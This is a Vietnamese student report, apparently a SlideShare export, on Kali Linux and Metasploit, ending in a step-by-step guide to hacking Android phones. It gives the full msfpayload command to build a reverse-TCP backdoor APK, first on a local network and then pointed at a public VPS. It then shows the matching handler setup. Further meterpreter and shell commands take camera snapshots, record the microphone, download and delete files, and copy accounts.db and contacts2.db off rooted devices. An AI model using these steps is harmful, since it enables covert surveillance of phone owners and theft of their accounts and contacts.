3.1.3. Khả năng tùy biến cao 
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ 
đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy 
theo sở thích và thói quen sử dụng. 
3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai 
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với 
BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn 
toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). 
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn 
trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn 
toàn nữa. 
3.2.Cài đặt Kali Linux
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 14
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 15
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 16
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 17
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 18
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 19
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 20
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 21
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 22
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 23
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
3.3.Metasploit framework trong Kali linux 
3.3.1. Giới thiệu 
Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode 
(payload) để tấn công máy có lỗ hổng.Cùng với một số bộ công cụ bảo mật khác. Metasploit có 
cơ sở dữ liệu chứa hàng ngàn shellcode,hàng ngàn exploit của các hệ điều hành,các chương trình 
hay dịch vụ.Trong quá trình phát triển metasploit liên tục cập nhật các exploit... nên càng ngày nó 
càng trở thành một bộ công cụ mạnh mẽ. 
Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn, nhưng đối với những hacker 
thì nó thực sự là một công cụ vô cùng hữu ích (dùng để kiểm tra, khai thác lỗi, exploit…) 
3.3.2. Sử dụng metasploit framework 
3.3.2.1.Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà metasploit có hỗ trợ để 
Trang 24 
khai thác 
Muốn chọn ta có thể dùng lệnh "show exploits" để hiện ra tất cả các exploit mà metasploit 
framework có hỗ trợ. 
Để dùng exploit nào đó ta dùng câu lệnh "use name_exploit" .Trong đó tham số name_exploit là 
tên của exploit đc metasploit hỗ trợ. 
Để biết thêm các thông tin về exploit mà ta đã chọn có thể dùng lệnh "info name_exploit". 
Ví dụ: mình sử dụng một exploit sau khi đã liệt kê ra sẽ là: 
use windows/manage/add_user_domain 
3.3.2.2.Cấu hình module exploit đã chọn 
Sau khi đã chọn một exploit với command use, việc tiếp theo là cấu hình các options mà exploit 
này yêu cầu. Để rõ hơn exploit này nó yêu cầu cấu hình như thế nào, phải cấu hình những gì, ta sử 
dụng lệnh "show options". 
Khi sử dụng lệnh show option ta thường nhận đc một bảng gồm các cột như sau: 
Name--------------Current Setting----------------Required---------------Description 
Trong đó, ở cột required nếu giá trị là "yes" thì ta phải set giá trị cho tham số này, còn nếu là "no" 
thì ta có thể set hoặc không. Quan trọng phải xem một số nó đã cấu hình mặc định cho rồi có 
thích hợp với chúng ta hay không. 
Ta dùng lệnh “set” để cấu hình những options của module đó. 
Ngoài ra nó còn có thêm một số options khác,dùng "show advanced", "show evasion" để xem. 
Sau khi cấu hình xong ta cần kiểm tra xem việc cấu hình đã đúng hay chưa. Để kiểm tra việc cấu 
hình ta dùng lệnh "check" để xem mục tiêu có bị tấn công được hay không. Đây là một cách
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
nhanh để ta kiểm tra xem việt cấu hình các options bằng lệnh set có đúng hay không và mục tiêu 
thực sự có lỗ hổng để khai thác được hay không. Nhưng không phải tất cả các exploit đều thực sự 
có thể kiểm tra được bằng việc sự dụng lệnh check. Đôi khi ta phải thực sự exploit nó mới biết 
được. 
Trang 25 
3.3.2.3.Lựa chọn payload 
Payload là một đoạn code đc chạy trên máy victim, dùng để thực hiện một số họat động nào đó, 
hoặc dùng để kết nối về máy của hacker. 
Vậy làm sao để có cái payload này trên máy của victim? Có 2 phương pháp chủ yếu được dùng. 
Đó là gửi cho victim thông qua việc phân tính một lỗi, lỗ hổng nào đó trên hệ thống victim, từ đó 
đột nhập và đưa đoạn payload này vào máy victim. Kiểu thứ 2 là gửi trực tiếp cho victim, chờ đợi 
victim sơ ý nhận nó. 
Để hiện thị các payloads tích hợp cho exploit hiện tại chúng ta đang dùng, ta dùng lệnh "show 
payloads". 
Tương ứng với mỗi OS khác nhau ta dùng một payload khác nhau, và phương pháp cũng khác 
nhau. Các giao thức dùng cũng khác nhau... Nhìn chung đối với payload có thể phân ra làm 2 loại 
cơ bản đó là bind payload và reverse payload. Khi nào ta dùng loại nào? Đây cũng là một vấn đề 
quan trọng. Nếu như máy của chúng ta (đóng vai trò là hacker) đứng sau một tường lửa, thì lúc 
này ta nên dùng bind payload. Mở một port trên máy tính và kết nối trực tiếp từ máy hacker đến 
máy victim. Còn nếu như victim đứng sau một tường lửa, còn chúng ta thì không. Khi đó chúng ta 
dùng reverse payload để connect ngược từ máy victim về máy chúng ta. Như vậy cho thấy khi tấn 
công mục tiêu, ta phải tìm hiểu rõ ràng về mục tiêu, tìm kiếm tất cả các thông tin có thể có. Dựa 
vào đó mà ta chọn cách thích hợp. 
Khi ta quyết định chọn một payload nào đó, dùng lệnh "set PAYLOAD name_payload" để chọn 
payload cần dùng. 
Giả sử muốn dùng payload windows/meterpreter/reverse_ord_tcp thì ta thao tác là: 
set PAYLOAD windows/meterpreter/reverse_ord_tcp 
Ta nhận đc là: PAYLOAD => windows/meterpreter/reverse_ord_tcp 
Tượng tự để xem rõ thông tin, options về payload ta có thể dùng các lệnh như "show options", 
"info name_payload" ,"show advanced",… 
Sau khi thực hiện tất cả các thiết lập xong thì ta dùng lệnh "exploit" để xem kết quả. 
3.4.Tấn công android dùng Metasploit Framework trong Kali Linux
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh: 
msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R > 
/root/Desktop/app.apk 
Trong đó 192.168.159.128 là địa chỉ ip của máy Kali.Chúng ta có thể xem nó bằng cách dùng 
lệnh: 
Trang 26 
ifconfig
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Và đây là file app.apk mà chúng ta vừa tạo 
Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh: 
Trang 27 
msfconsole
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Chúng ta cài đặt các thông số cần thiết 
Trang 28 
use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set lhost 192.168.159.128 
set lport 8080 
Với lhost và lport giống với khi chúng ta tạo file app.apk 
Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới, nhấp 
vào nút Reverse_tcp:
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau: 
Trang 29 
Để xem thông tin về máy, nhập lệnh sysinfo 
- Sử dụng camera: 
Để xem danh sách camera, nhập webcam_list
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Để chụp hình bằng camera, nhập webcam_snap a với a là id của camera xem ở danh sách camera 
ở phần trước. Ví dụ như sau: 
Trang 30 
- Ghi âm 
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 31 
- Lấy file từ sd card 
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục 
Ta tải file app.apk trong thư mục Download của sdcard 
Dùng lệnh cd /sdcard/Download để vào thư mục
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh 
Trang 32 
download app.apk 
Và file này sẽ được tải về thư mục root của máy Kali 
4. Thực hiện xâm nhập android thông qua mạng Internet 
4.1.Giới thiệu về VPS 
4.1.1. VPS là gì? 
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành 
nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài 
khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS 
có hiệu năng cao hơn Share Host rất nhiều. 
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản 
lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị 
hack local. 
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên 
server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website 
khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản 
khác trên VPS đều hoạt động bình thường.
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy 
trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có 
thêm một số kiến thức về bảo mật, cấu hình server,…. 
4.1.2. Đặc điểm về thông số VPS 
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM 
riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. 
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. 
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì 
có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên 
VPS, dowload/upload bittorrent với tốc độ cao… 
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không 
cần phải khởi động lại hệ thống. 
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. 
4.1.3. Giá trị khi sử dụng VPS 
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp. 
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. 
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. 
Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. 
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh. 
Trang 33
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 34 
4.2.Cài đặt metasploit 
Để cài đặt metasploit trước tiên ta phải vào trang http://metasploit.com để tải bộ cài đặt metasploit 
về máy của mình. Ta nhấp vào phần Free Metasploit Download và nó sẽ hiện ra trang bên dưới 
Ở đây mình sẽ down bản METASPLOIT COMMUNITY. 
Sau khi nhấp vào link, nó sẽ xuất hiện một trang đăng kí. Mình nhập thông tin đầy đủ và nhấp vào 
SUBMIT & DOWNLOAD để nhận một license
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Tiếp theo nó sẽ xuất hiện trang download, ta sẽ chọn bản phù hợp. 
Sau khi tải xong, ta bắt đầu tiến trình cài đặt. Trước tiên ta nhấp vào bản cài đặt và nhấn Next 
Trang 35
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Bên dưới ta chọn thư mục để cài đặt và nhấn Next 
Ta phải đảm bảo rằng các phần mềm diệt virut đều được đóng, nếu không nó sẽ ngăn cản việc cài 
đặt 
Trang 36
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
SLL Port, Server Name và Days of validity ta để mặc định 
Trang 37 
Ta tiếp tục nhấn Next để bắt đầu cài đặt
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Cài đặt xong ta nhấp Finish để kết thúc việc cài đặt 
Sau khi kết thúc việc cài đặt, ta sẽ vào link http://localhost:3790/ để đăng kí tài khoản. Ta nhấp 
đầy đủ theo những yêu cầu bên dưới và nhấn Create Account 
Trang 38
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Sau đó trình duyệt sẽ chuyển đến trang nhập key để active chương trình 
Ta vào địa chỉ mail mà ta đã sử dụng khi download bộ cài đăt metasploit, điền key vào và nhấn 
ACTIVE LICENSE 
Trang 39
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 40 
Như vậy là ta đã có một tài khoản metasploit 
4.3.Xâm nhập vào thiết bị android 
Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor: 
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R> 
/root/Desktop/app.apk 
Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. 
/root/Desktop/app.apk là đường dẫn chứa file vừa tạo.
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Sau khi tạo một backdoor được tạo, ta tải nó lên mạng. 
Khi máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới: 
Ta vào máy VPS và mở Metasploit Console lên 
Trang 41
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một môi trường và liên kết với máy android mà ta 
sẽ tấn công: 
Trang 42 
use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set lhost 14.0.21.184 
set lport 4444 
run 
Ở đây lhost và lport phải giống với lhost và lport khi tạo backdoor 
Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android 
Trang 43 
- Xem thông tin 
Ta dùng lệnh sysinfo để xem thông tin máy android
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 44 
- Xem camera 
Ta dùng lênh webcam_list để xem danh sách các camera 
Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android. 
Trong đó: x là 1: Back Camera 
2: Front Camera 
Để di chuyển đến thư mục nào ta dùng lệnh 
cd<đường dẫn đến thư mục> 
Lệnh ls để xem trong thư mục có những gì 
Ta vào thư mục /sdcard/Download để down file về
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 45 
- Download file 
Ta dùng lệnh download<tên file> để down file đó về máy VPS của ta 
Muốn xóa một file ta dùng lệnh rm<tên file>
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 46 
- Đánh cắp tài khoản, danh bạ 
Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này 
phải được root trước đó. 
Ta dùng lệnh shell để vào hệ thống 
Dùng lệnh su để toàn quyền truy cập 
Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là 
unknown uid 0 
Ta gõ cd /data/system để vào thư mục system 
Tiếp theo gõ ls –l để xem trong thư mục có gì
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard 
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh 
download file accounts.db về máy VPS của chúng ta 
Trang 47
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 48 
Tiếp tục ta vào địa chỉ 
cd /data/data/com.android.providers.contacts/databases 
Để copy file contacts2.db về Sdcard bằng lệnh 
cp contacts2.db /sdcard 
Sau đó ta download file contacts2.db về máy VPS
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của 
chúng ta 
Trang 49
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 50

More Related Content

What's hot

Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1tuankiet123
 
Android update
Android updateAndroid update
Android updatekuto92love
 
Nghiên cưú và phát triển Android OS
Nghiên cưú và phát triển Android OSNghiên cưú và phát triển Android OS
Nghiên cưú và phát triển Android OSNguyễn Anh
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1tuankiet123
 
Slide hội thảo Google Android BKHN 26-10
Slide hội thảo Google Android BKHN 26-10Slide hội thảo Google Android BKHN 26-10
Slide hội thảo Google Android BKHN 26-10Giap Le Van
 
Bao cao tong hop
Bao cao tong hopBao cao tong hop
Bao cao tong hopHắc Ảnh
 
Bao cao thuc tap athena
Bao cao thuc tap athenaBao cao thuc tap athena
Bao cao thuc tap athenaHắc Ảnh
 
Đồ án tốt nghiệp Xây dựng ứng dụng fastfood trên nền android
Đồ án tốt nghiệp Xây dựng ứng dụng fastfood trên nền androidĐồ án tốt nghiệp Xây dựng ứng dụng fastfood trên nền android
Đồ án tốt nghiệp Xây dựng ứng dụng fastfood trên nền androidlaonap166
 
lập trình di động
lập trình di độnglập trình di động
lập trình di độngtruong le hung
 
Google Android Security (Basic2Advanced)
Google Android Security (Basic2Advanced)Google Android Security (Basic2Advanced)
Google Android Security (Basic2Advanced)Giap Le Van
 
Mobile programming
Mobile programming Mobile programming
Mobile programming Thinh Huynh
 
Lap trinh thiet bi di dong voi j2me
Lap trinh thiet bi di dong voi j2meLap trinh thiet bi di dong voi j2me
Lap trinh thiet bi di dong voi j2mecậu buồn Vì Ai
 
Slide thuyet trinh android
Slide thuyet trinh androidSlide thuyet trinh android
Slide thuyet trinh androidkuto92love
 
Báo cáo thực tập chuyên nghành lập trình Android GPSGroup
Báo cáo thực tập chuyên nghành lập trình Android GPSGroupBáo cáo thực tập chuyên nghành lập trình Android GPSGroup
Báo cáo thực tập chuyên nghành lập trình Android GPSGroupTinh Ngo
 
Xây dựng phần mềm trên window Phone
Xây dựng phần mềm trên window PhoneXây dựng phần mềm trên window Phone
Xây dựng phần mềm trên window Phonentanh80
 
Tìm hiểu về hệ điều hành android
Tìm hiểu về hệ điều hành androidTìm hiểu về hệ điều hành android
Tìm hiểu về hệ điều hành androidPhuong Ngo
 
Lap trinh android_co_ban_eclip
Lap trinh android_co_ban_eclipLap trinh android_co_ban_eclip
Lap trinh android_co_ban_eclipktvinh
 
Seminar windows phone 8.1
Seminar windows phone 8.1Seminar windows phone 8.1
Seminar windows phone 8.1Tri Nguyen
 
Tìm hiểu về hệ điều hành android
Tìm hiểu về hệ điều hành androidTìm hiểu về hệ điều hành android
Tìm hiểu về hệ điều hành androidTÓc Đỏ XuÂn
 

What's hot (20)

Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1
 
Android update
Android updateAndroid update
Android update
 
Nghiên cưú và phát triển Android OS
Nghiên cưú và phát triển Android OSNghiên cưú và phát triển Android OS
Nghiên cưú và phát triển Android OS
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1
 
Slide hội thảo Google Android BKHN 26-10
Slide hội thảo Google Android BKHN 26-10Slide hội thảo Google Android BKHN 26-10
Slide hội thảo Google Android BKHN 26-10
 
Bao cao tong hop
Bao cao tong hopBao cao tong hop
Bao cao tong hop
 
Bao cao thuc tap athena
Bao cao thuc tap athenaBao cao thuc tap athena
Bao cao thuc tap athena
 
Đồ án tốt nghiệp Xây dựng ứng dụng fastfood trên nền android
Đồ án tốt nghiệp Xây dựng ứng dụng fastfood trên nền androidĐồ án tốt nghiệp Xây dựng ứng dụng fastfood trên nền android
Đồ án tốt nghiệp Xây dựng ứng dụng fastfood trên nền android
 
Đề tài: Ứng dụng Android ôn luyện trắc nghiệm tiếng Anh, HOT
Đề tài: Ứng dụng Android ôn luyện trắc nghiệm tiếng Anh, HOTĐề tài: Ứng dụng Android ôn luyện trắc nghiệm tiếng Anh, HOT
Đề tài: Ứng dụng Android ôn luyện trắc nghiệm tiếng Anh, HOT
 
lập trình di động
lập trình di độnglập trình di động
lập trình di động
 
Google Android Security (Basic2Advanced)
Google Android Security (Basic2Advanced)Google Android Security (Basic2Advanced)
Google Android Security (Basic2Advanced)
 
Mobile programming
Mobile programming Mobile programming
Mobile programming
 
Lap trinh thiet bi di dong voi j2me
Lap trinh thiet bi di dong voi j2meLap trinh thiet bi di dong voi j2me
Lap trinh thiet bi di dong voi j2me
 
Slide thuyet trinh android
Slide thuyet trinh androidSlide thuyet trinh android
Slide thuyet trinh android
 
Báo cáo thực tập chuyên nghành lập trình Android GPSGroup
Báo cáo thực tập chuyên nghành lập trình Android GPSGroupBáo cáo thực tập chuyên nghành lập trình Android GPSGroup
Báo cáo thực tập chuyên nghành lập trình Android GPSGroup
 
Xây dựng phần mềm trên window Phone
Xây dựng phần mềm trên window PhoneXây dựng phần mềm trên window Phone
Xây dựng phần mềm trên window Phone
 
Tìm hiểu về hệ điều hành android
Tìm hiểu về hệ điều hành androidTìm hiểu về hệ điều hành android
Tìm hiểu về hệ điều hành android
 
Lap trinh android_co_ban_eclip
Lap trinh android_co_ban_eclipLap trinh android_co_ban_eclip
Lap trinh android_co_ban_eclip
 
Seminar windows phone 8.1
Seminar windows phone 8.1Seminar windows phone 8.1
Seminar windows phone 8.1
 
Tìm hiểu về hệ điều hành android
Tìm hiểu về hệ điều hành androidTìm hiểu về hệ điều hành android
Tìm hiểu về hệ điều hành android
 

Viewers also liked

Bao cao cuoi li
Bao cao cuoi liBao cao cuoi li
Bao cao cuoi liLê Lãnh
 
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan SolusiProses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan SolusiGanjar Muttaqin
 
Alkaline Antioxidant Water
Alkaline Antioxidant WaterAlkaline Antioxidant Water
Alkaline Antioxidant Waterwcateam
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan SolusiProses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan SolusiGanjar Muttaqin
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploitLê Lãnh
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSLê Lãnh
 
Jurnal ahmad solihinazhari (0907365)
Jurnal ahmad solihinazhari (0907365)Jurnal ahmad solihinazhari (0907365)
Jurnal ahmad solihinazhari (0907365)adpend
 
Seminar sfl gba UPI Bandung 2015
Seminar sfl gba UPI Bandung 2015Seminar sfl gba UPI Bandung 2015
Seminar sfl gba UPI Bandung 2015Ganjar Muttaqin
 
yash shah and aditya rathi
yash shah and aditya rathiyash shah and aditya rathi
yash shah and aditya rathipranavkundra
 
Pranav and yash saraiya
Pranav and yash saraiyaPranav and yash saraiya
Pranav and yash saraiyapranavkundra
 
SYSTEMIC HYPERTENSION
SYSTEMIC HYPERTENSIONSYSTEMIC HYPERTENSION
SYSTEMIC HYPERTENSIONsahar Hamdy
 
Lymphadenopathy approach
Lymphadenopathy approachLymphadenopathy approach
Lymphadenopathy approachsahar Hamdy
 

Viewers also liked (16)

Bao cao cuoi li
Bao cao cuoi liBao cao cuoi li
Bao cao cuoi li
 
Lapel pins
Lapel pinsLapel pins
Lapel pins
 
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan SolusiProses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
 
Tuan4
Tuan4Tuan4
Tuan4
 
Alkaline Antioxidant Water
Alkaline Antioxidant WaterAlkaline Antioxidant Water
Alkaline Antioxidant Water
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
 
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan SolusiProses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
Proses pembelajaran 5M Konsep Masalah dan Kemungkinan Solusi
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
 
Jurnal ahmad solihinazhari (0907365)
Jurnal ahmad solihinazhari (0907365)Jurnal ahmad solihinazhari (0907365)
Jurnal ahmad solihinazhari (0907365)
 
Seminar sfl gba UPI Bandung 2015
Seminar sfl gba UPI Bandung 2015Seminar sfl gba UPI Bandung 2015
Seminar sfl gba UPI Bandung 2015
 
yash shah and aditya rathi
yash shah and aditya rathiyash shah and aditya rathi
yash shah and aditya rathi
 
Pranav and yash saraiya
Pranav and yash saraiyaPranav and yash saraiya
Pranav and yash saraiya
 
Pranit and Kata
Pranit and KataPranit and Kata
Pranit and Kata
 
SYSTEMIC HYPERTENSION
SYSTEMIC HYPERTENSIONSYSTEMIC HYPERTENSION
SYSTEMIC HYPERTENSION
 
Lymphadenopathy approach
Lymphadenopathy approachLymphadenopathy approach
Lymphadenopathy approach
 

Similar to Bao cao giua ki

Bao cao giua ky
Bao cao giua kyBao cao giua ky
Bao cao giua kyNhoxPO
 
Luận văn xây dựng ứng dụng android ôn luyện Trắc Nghiệm Tiếng Anh.doc
Luận văn xây dựng ứng dụng android ôn luyện Trắc Nghiệm Tiếng Anh.docLuận văn xây dựng ứng dụng android ôn luyện Trắc Nghiệm Tiếng Anh.doc
Luận văn xây dựng ứng dụng android ôn luyện Trắc Nghiệm Tiếng Anh.docsividocz
 
Tài liệu học Lập trình Android với Kotlin cơ bản - Trung tâm Tin học Khoa học...
Tài liệu học Lập trình Android với Kotlin cơ bản - Trung tâm Tin học Khoa học...Tài liệu học Lập trình Android với Kotlin cơ bản - Trung tâm Tin học Khoa học...
Tài liệu học Lập trình Android với Kotlin cơ bản - Trung tâm Tin học Khoa học...hoclaptrinhkhtn
 
Giới thiệu FireFox OS
Giới thiệu FireFox OSGiới thiệu FireFox OS
Giới thiệu FireFox OSDraku Quậy
 
Luận Văn Xây Dựng Ứng Dụng Android Tương Tác Với Facebook.doc
Luận Văn Xây Dựng Ứng Dụng Android Tương Tác Với Facebook.docLuận Văn Xây Dựng Ứng Dụng Android Tương Tác Với Facebook.doc
Luận Văn Xây Dựng Ứng Dụng Android Tương Tác Với Facebook.docsividocz
 
Bao cao cuoi ki version full
Bao cao cuoi ki version fullBao cao cuoi ki version full
Bao cao cuoi ki version fullVõ Nhựt Tân
 
Luận Văn Xây Dựng Ứng Dụng Android Ghi Nhật Ký Chi Tiêu Online.doc
Luận Văn Xây Dựng Ứng Dụng Android Ghi Nhật Ký Chi Tiêu Online.docLuận Văn Xây Dựng Ứng Dụng Android Ghi Nhật Ký Chi Tiêu Online.doc
Luận Văn Xây Dựng Ứng Dụng Android Ghi Nhật Ký Chi Tiêu Online.docsividocz
 
Tim hieu lap_trinh_android_va_tu_xay_dung_ung_dung_minh_hoa_20120809043144_31
Tim hieu lap_trinh_android_va_tu_xay_dung_ung_dung_minh_hoa_20120809043144_31Tim hieu lap_trinh_android_va_tu_xay_dung_ung_dung_minh_hoa_20120809043144_31
Tim hieu lap_trinh_android_va_tu_xay_dung_ung_dung_minh_hoa_20120809043144_31thequocbk
 
Tìm đường trên di động (PhoneGap)
Tìm đường trên di động (PhoneGap)Tìm đường trên di động (PhoneGap)
Tìm đường trên di động (PhoneGap)Lương Bá Hợp
 

Similar to Bao cao giua ki (19)

Bao cao giua ky
Bao cao giua kyBao cao giua ky
Bao cao giua ky
 
Đề tài: Xây dựng ứng dụng Android đọc báo mạng qua dịch vụ RSS
Đề tài: Xây dựng ứng dụng Android đọc báo mạng qua dịch vụ RSSĐề tài: Xây dựng ứng dụng Android đọc báo mạng qua dịch vụ RSS
Đề tài: Xây dựng ứng dụng Android đọc báo mạng qua dịch vụ RSS
 
